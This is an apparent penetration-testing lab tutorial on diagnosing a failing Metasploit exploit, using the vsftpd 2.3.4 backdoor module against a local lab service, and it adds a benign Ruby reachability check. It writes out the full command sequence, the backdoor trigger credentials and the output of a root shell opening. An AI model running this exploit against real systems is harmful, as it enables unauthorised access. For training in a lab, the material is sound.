Introduction
Metasploit is a powerful penetration testing framework that makes hacking simple. However, even with the best tools, exploits can fail for various reasons: incorrect target information, a patched system, or network issues. Knowing how to diagnose and fix these failures is a critical skill for any security professional.
In this lab, you will learn the basic workflow for troubleshooting a failing exploit in Metasploit. We will intentionally misconfigure an exploit, observe the failure, and then use Metasploit's built-in tools to identify and correct the problem. You will learn to use commands like show options, check, and the Verbose setting to get the information you need to succeed.
For this lab, a vulnerable FTP server has been started in the background on your local machine, which will serve as our target.
Select an exploit and set incorrect options
In this step, we will launch the Metasploit Framework console, select an exploit module, and intentionally configure it with an incorrect option to simulate a common user error. This will set the stage for the troubleshooting process.
First, open your terminal and start the Metasploit console. We use the -q (quiet) flag to skip the banner and speed up the loading process.
msfconsole -q
Once you are at the msf6 > prompt, we will search for an exploit targeting the vsftpd service.
search vsftpd
You will see a list of modules. We are interested in the exploit/unix/ftp/vsftpd_234_backdoor. Let's select it using the use command.
use exploit/unix/ftp/vsftpd_234_backdoor
Your prompt will change to indicate that the exploit module is now active. Now, we need to configure the target. The most important option is RHOSTS, which stands for Remote Hosts. We will deliberately set this to an incorrect IP address.
set RHOSTS 192.168.1.100
You will see a confirmation that RHOSTS has been set. We have now prepared an exploit that is guaranteed to fail.
Run the exploit and observe the failure message
In this step, you will execute the misconfigured exploit and learn to interpret the resulting failure message. This is the first and most crucial part of troubleshooting.
With the vsftpd_234_backdoor exploit selected and the incorrect RHOSTS set, let's try to run it. You can use either the run or exploit command.
run
The exploit will attempt to connect to the IP address we provided (192.168.1.100). Since this host is not reachable from the lab environment, the exploit will fail. You will see an output similar to this:
[*] 192.168.1.100:21 - The target is not exploitable.
[*] Exploit completed, but no session was created.
The message The target is not exploitable or a similar connection error message is a clear indicator that Metasploit could not reach or interact with the target service. This tells us the problem is likely related to networking or the target host configuration.
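A quick way to tell a wrong RHOSTS from a closed port or an unexpected service before re-running the module. This is an added example, not part of the original lab or of Metasploit itself; the helper names preflight and classify_banner are hypothetical, and the expected banner is the one this lab's target announces.

```ruby
require 'socket'

# Classify an FTP greeting line. The lab target greets with "220 (vsFTPd 2.3.4)".
def classify_banner(banner)
  return :no_banner if banner.nil? || banner.strip.empty?
  return :not_ftp unless banner.start_with?('220')
  banner.include?('vsFTPd 2.3.4') ? :expected_service : :other_ftp_service
end

# Hypothetical helper: open a TCP connection to host:port (the values you
# would put in RHOSTS/RPORT), read one greeting line, and report which
# layer failed: addressing, routing, the port, or the service itself.
def preflight(host, port, timeout: 3)
  sock = Socket.tcp(host, port, connect_timeout: timeout)
  # Wait up to `timeout` seconds for the server to send its greeting.
  banner = IO.select([sock], nil, nil, timeout) ? sock.gets : nil
  { reachable: true, banner: banner&.strip, verdict: classify_banner(banner) }
rescue Errno::ECONNREFUSED
  # Host answered, but nothing listens on that port: check RPORT or the service.
  { reachable: false, verdict: :port_closed }
rescue Errno::ETIMEDOUT, Errno::EHOSTUNREACH, Errno::ENETUNREACH
  # No route or no answer: the RHOSTS value is the first suspect.
  { reachable: false, verdict: :host_unreachable }
rescue SocketError
  # The host string did not resolve to an address at all.
  { reachable: false, verdict: :bad_address }
ensure
  sock&.close
end

# Stand-alone use: ruby preflight.rb 127.0.0.1 21
if __FILE__ == $PROGRAM_NAME && ARGV.size == 2
  p preflight(ARGV[0], Integer(ARGV[1]))
end
```

A :host_unreachable or :port_closed verdict points back at RHOSTS and RPORT; :other_ftp_service means the connection works but the service is not the version this module targets.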
Use the show options command to review configuration
After seeing a failure, the first logical action is to review our settings. The show options command is the primary tool for this task. It displays all the configurable parameters for the current module.
Let's check the options we have set for our exploit.
show options
This command will display a table of options for the vsftpd_234_backdoor exploit:
Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.1.100    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)

Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Automatic
Look closely at the Current Setting for RHOSTS. It's 192.168.1.100, which we know is incorrect. The vulnerable service for this lab is running on the local machine. The IP address for the local machine is 127.0.0.1.
Let's correct the RHOSTS value.
set RHOSTS 127.0.0.1
Now, if you run show options again, you will see the RHOSTS value has been updated correctly.
Use the check command to test for exploitability
In this step, you'll learn to use the check command. Before running an exploit, it's often wise to check if the target is actually vulnerable. The check command allows you to do this safely, without actually executing the exploit payload. Note that not all modules support this feature.
Now that we have corrected the RHOSTS option, let's use check to see if Metasploit thinks the target is vulnerable.
check
If the target is configured correctly and the service is vulnerable, you should see a positive confirmation message.
[*] 127.0.0.1:21 - The target is vulnerable.
This message, The target is vulnerable, gives us high confidence that the exploit will succeed when we run it. It confirms that Metasploit was able to connect to the target and verify the presence of the backdoor. If it had failed, we would need to investigate further, but for now, this is a very good sign.
Set the Verbose option to true and re-run for more details
In this step, you will learn about the Verbose option. Sometimes, even when check succeeds, an exploit might fail. To get more insight into what the exploit is doing behind the scenes, you can enable verbose logging. This is a global setting that affects all modules.
Let's enable verbose mode using the setg command, which sets a value globally.
setg Verbose true
Now, with verbose mode enabled and the correct RHOSTS, let's run the exploit again.
run
This time, you will see much more detailed output. The verbose logging shows you the step-by-step process of the exploit, including connection attempts and data being sent. Most importantly, the exploit should now succeed.
[*] 127.0.0.1:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 127.0.0.1:21 - USER: Sending "USER back:)"
[*] 127.0.0.1:21 - PASS: Sending "PASS moor"
[+] 127.0.0.1:21 - Found shell.
[*] Command shell session 1 opened (127.0.0.1:43999 -> 127.0.0.1:6200) at 2023-10-27 10:00:00 -0400
Success! The message Command shell session 1 opened confirms that you have successfully compromised the target. You now have a command shell on the remote system. You can test it by running a simple command like whoami.
whoami
You should see the output root. To exit the shell and return to the Metasploit prompt, press Ctrl + C or type exit.
Summary
Congratulations on completing the lab! You have successfully learned the fundamental process for troubleshooting a failing exploit in the Metasploit Framework.
In this lab, you practiced a systematic approach to problem-solving:
- Observe Failure: You first ran a misconfigured exploit to see it fail.
- Review Options: You used show options to inspect the configuration and identify an incorrect RHOSTS value.
- Check Vulnerability: You used the check command to safely verify that the target was vulnerable after correcting the configuration.
- Get More Detail: You learned to use setg Verbose true to get detailed, step-by-step output, which is invaluable for diagnosing more complex issues.
These core skills will help you overcome common obstacles and use Metasploit more effectively in your penetration testing activities.


